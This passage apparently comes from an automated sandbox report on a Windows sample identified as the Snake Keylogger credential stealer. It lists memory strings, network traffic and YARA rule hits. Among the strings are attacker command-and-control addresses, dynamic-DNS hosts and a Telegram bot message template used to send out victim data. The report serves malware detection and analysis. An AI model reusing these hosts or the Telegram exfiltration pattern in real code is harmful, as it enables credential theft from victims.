Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 30 Sep 2024 13:03:41 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: 3140, EUR.exe, 00000008.00000002.4122819893.000000000318E000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.000000000337F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: 3140, EUR.exe, 00000008.00000002.4122819893.000000000319E000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.000000000338F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://quicklyserv.com
Source: 3140, EUR.exe, 00000000.00000002.1727021709.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1802993888.0000000002C98000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20a
Source: lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: 3140, EUR.exe, 00000008.00000002.4122819893.00000000031CB000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: 3140, EUR.exe, 00000008.00000002.4122819893.000000000305F000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032BE000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.000000000324F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.000000000305F000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.000000000324F000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.000000000324F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: 3140, EUR.exe, 00000008.00000002.4122819893.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003089000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032BE000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003279000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: 3140, EUR.exe, 00000008.00000002.4122819893.0000000003117000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.000000000413B000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004292000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004162000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000043B5000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000040ED000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004480000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000044CE000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000432A000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000045A4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004351000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003307000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: 3140, EUR.exe, 00000008.00000002.4131086407.00000000040CA000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004390000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.000000000413E000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000040F5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004487000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000432D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000457F000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000445C000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: 3140, EUR.exe, 00000008.00000002.4122819893.0000000003117000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.000000000413B000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004162000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000043B5000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000040ED000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004480000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000044CE000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000432A000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000045A4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004351000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003307000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: 3140, EUR.exe, 00000008.00000002.4131086407.00000000040CA000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004390000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.000000000413E000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000040F5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004487000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000432D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000457F000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000445C000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033F2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003307000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: 3140, EUR.exe, 00000008.00000002.4122819893.00000000031FC000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49777 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Detected potential crypto function
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07644608 0_2_07644608
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_076436D0 0_2_076436D0
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07640040 0_2_07640040
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07640F28 0_2_07640F28
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07647918 0_2_07647918
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0764E750 0_2_0764E750
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_076436C0 0_2_076436C0
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_076445F9 0_2_076445F9
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_076434C0 0_2_076434C0
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_076434B1 0_2_076434B1
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07645378 0_2_07645378
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07645331 0_2_07645331
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07645388 0_2_07645388
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07643260 0_2_07643260
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07643250 0_2_07643250
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0764C168 0_2_0764C168
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0764001E 0_2_0764001E
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_076430C0 0_2_076430C0
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_076430B0 0_2_076430B0
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07640F17 0_2_07640F17
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07641E40 0_2_07641E40
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07643E40 0_2_07643E40
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07644E40 0_2_07644E40
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07641E50 0_2_07641E50
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07643E50 0_2_07643E50
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07644E50 0_2_07644E50
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07643EFB 0_2_07643EFB
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0764BD30 0_2_0764BD30
